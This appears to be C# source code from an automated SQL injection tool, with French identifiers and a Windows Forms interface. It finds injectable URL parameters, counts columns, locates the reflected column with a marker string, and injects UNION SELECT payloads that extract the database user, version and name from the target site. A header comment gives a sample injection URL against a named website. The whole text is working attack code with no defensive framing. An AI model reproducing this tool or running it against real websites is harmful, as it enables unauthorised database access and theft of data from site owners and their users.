/*
* //EXCEPTION
* http://www.eatmybrains.com/showreview.php?id=999999.9 union all select [t],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
*
*
*/
public void Analyse(string url)
{
form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
{
form.txt_statut_analyse.Text = "Analyse: " + url + Environment.NewLine;
}));
checked
{
HttpRequete hr = new HttpRequete();
sqli_check vrf = new sqli_check();
sqli_colonne colonne = new sqli_colonne();
string url_inj_point = string.Empty;
string inj_point_curr = string.Empty;
bool point_trv = false;
_url_originale = url;
_url_base = url.Split('?')[0];
_param = ch.analyseParam(url);
bool[] ok = new bool[2];
ok[0] = vrf.demmareAnalyseFast(url);
ok[1] = vrf.demmareAnalyseAvanced(url);
if (ok[0] || ok[1])
{
int u = 0; //Union Style 1
while (!point_trv && u < _union.Count)
{
_nbr_colonne = colonne.Compter(_param, _url_base, _union[u]);
onFait((u + 1).ToString());
for (int p = 0; p < _param.Count; p++)
{
_colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);
url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);
inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));
string page = hr.get(inj_point_curr);
if (page.Contains(separateur) || page.Contains(s_separateur))
{
setResult(page, url_inj_point);
point_trv = true;
break;
}
}
u++;
}
}
else
{
form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
{
form.txt_statut_analyse.Text = "Injection char echouer :( ";
}));
}
}
}
public int FindColonneVise(string url, int maxColonne)
{
HttpRequete hr = new HttpRequete();
const string okstr = "QUADCOREENGINE666"; //51554144434f5245454e47494e45363636
string chkstr = "concat(0x217e21," + var_n + ",0x217e21)"; //concat(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21)
string url_f = string.Empty;
string _url_base = url.Split('?')[0];
string _url_params = "?" + url.Split('?')[1];
for (int i = 1; i <= maxColonne + 1; i++)
{
string param = ch.Encode(chkstr.Replace(var_n, ch.getHex(okstr)));
var regex = new Regex(Regex.Escape(i.ToString()));
url_f = _url_base + regex.Replace(_url_params, param, 1);
string page = hr.get(url_f);
if (page.Contains(okstr))
{
return(i);
}
}
//MessageBox.Show(url_f);
return(-1);
}
public bool demmareAnalyseAvanced(string url)
{
checked
{
string url_racine = url.Split('?')[0];
HttpRequete hr = new HttpRequete();
chaine ch = new chaine();
_param = ch.analyseParam(url);
string param_curr = baseI.Replace(var_n, baseF.Replace(var_n, ch.getHex(separateur) + "," + ch.getHex(testSTR) + "," + ch.getHex(separateur)));
for (int i = 0; i < _param.Count; i++)
{
string url_c = url_racine + ch.ViderDernierParam(ch.genParamParIndex(_param, 0, i + 1)) + ch.Encode(param_curr) + ch.genParamParIndex(_param, i + 1, _param.Count);
string page = hr.get(url_c);
if (verifPageAdvenced(page))
{
return(true);
}
}
return(false);
}
}
public string Analyse(string url)
{
checked
{
HttpRequete hr = new HttpRequete();
sqli_check vrf = new sqli_check();
sqli_colonne colonne = new sqli_colonne();
string url_inj_point = string.Empty;
string inj_point_curr = string.Empty;
bool point_trv = false;
_url_originale = url;
_url_base = url.Split('?')[0];
_param = ch.analyseParam(url);
int u = 0; //Union Style 1
while (!point_trv && u < _unionStyle.Count)
{
_nbr_colonne = colonne.Compter(_param, _url_base, _unionStyle[u]);
for (int p = 0; p < _param.Count; p++)
{
_colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);
url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);
inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));
string page = hr.get(inj_point_curr);
if (page.Contains(separateur) || page.Contains(s_separateur))
{
return(url_inj_point);
}
}
u++;
}
return("False");
}
}
public bool setInfos()
{
HttpRequete hr = new HttpRequete();
Outils oo = new Outils();
string url_g = _url_point.Replace(var_n, "concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")");
string page = hr.get(url_g);
if (page.Contains(separateur))
{
string[] rslt = ch.extSubResult(s_separateur, ch.extResult(separateur, page));
string ip = oo.avoirip(_url_point.Split('/')[2]);
setBD(rslt[2]);
form_principale.groupBox4.Invoke((MethodInvoker)(() =>
{
form_principale.txt_user.Text = rslt[0];
form_principale.txt_version.Text = rslt[1];
form_principale.txt_ipserveur.Text = ip;
}));
return(true);
}
else
{
return(false);
}
}
